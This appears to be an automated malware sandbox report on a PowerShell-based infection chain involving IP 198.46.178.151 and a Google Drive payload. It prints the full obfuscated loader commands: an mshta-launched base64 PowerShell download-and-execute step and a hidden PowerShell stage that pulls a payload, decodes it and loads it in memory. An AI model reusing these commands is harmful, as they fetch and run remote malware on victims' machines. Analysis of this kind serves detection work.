            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: unknownTCP traffic detected without corresponding DNS query: 198.46.178.151
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04714B90 URLDownloadToFileW,1_2_04714B90
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /66/seemethebestthingswithgreatneedswithgoodformewith.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 198.46.178.151Connection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
            Source: powershell.exe, 00000001.00000002.2212418076.00000000049B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2233257801.000000000734C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2233257801.0000000007289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIF
            Source: powershell.exe, 00000001.00000002.2233257801.0000000007289000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIF&
            Source: powershell.exe, 00000001.00000002.2233257801.000000000734C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.178.151/66/seemethebestthingswithgreatneedswithgoodformewith.tIFb.2l
            Source: powershell.exe, 00000003.00000002.2102346402.0000000007724000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micMt
            Source: powershell.exe, 00000001.00000002.2233257801.000000000730A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: powershell.exe, 00000003.00000002.2098893857.00000000057A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
            Source: powershell.exe, 00000001.00000002.2228919107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2100753552.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000009.00000002.2203278305.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.2098893857.00000000051B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.2212418076.0000000004861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2098893857.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2222911169.0000000004856000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2203278305.0000000004D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.2098893857.00000000051B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000009.00000002.2203278305.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000001.00000002.2212418076.0000000004861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2098893857.0000000005061000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2222911169.000000000482A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2222911169.0000000004839000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2203278305.0000000004D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000003.00000002.2098893857.00000000051B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: powershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000009.00000002.2203278305.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: powershell.exe, 00000009.00000002.2200698587.0000000002C30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2201572057.0000000002DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
            Source: powershell.exe, 00000009.00000002.2202206727.0000000003068000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur
            Source: powershell.exe, 00000009.00000002.2203278305.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2203278305.0000000004FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: powershell.exe, 00000009.00000002.2203278305.00000000051C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2203278305.0000000004FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
            Source: powershell.exe, 00000009.00000002.2203278305.00000000051C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.googleXb2
            Source: powershell.exe, 00000009.00000002.2203278305.0000000004E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2212418076.0000000004CBC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2203278305.0000000005438000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000001.00000002.2233257801.000000000734C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: powershell.exe, 00000001.00000002.2228919107.00000000058C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2100753552.00000000060C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2209729453.0000000005DA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
            Source: unknownHTTPS traffic detected: 142.250.185.206:443 -> 192.168.2.5:49705 version: TLS 1.2

            System Summary

            barindex
            Detected Cobalt Strike Beacon
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenTJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))"Jump to behavior
            Malicious sample detected (through community Yara rule)
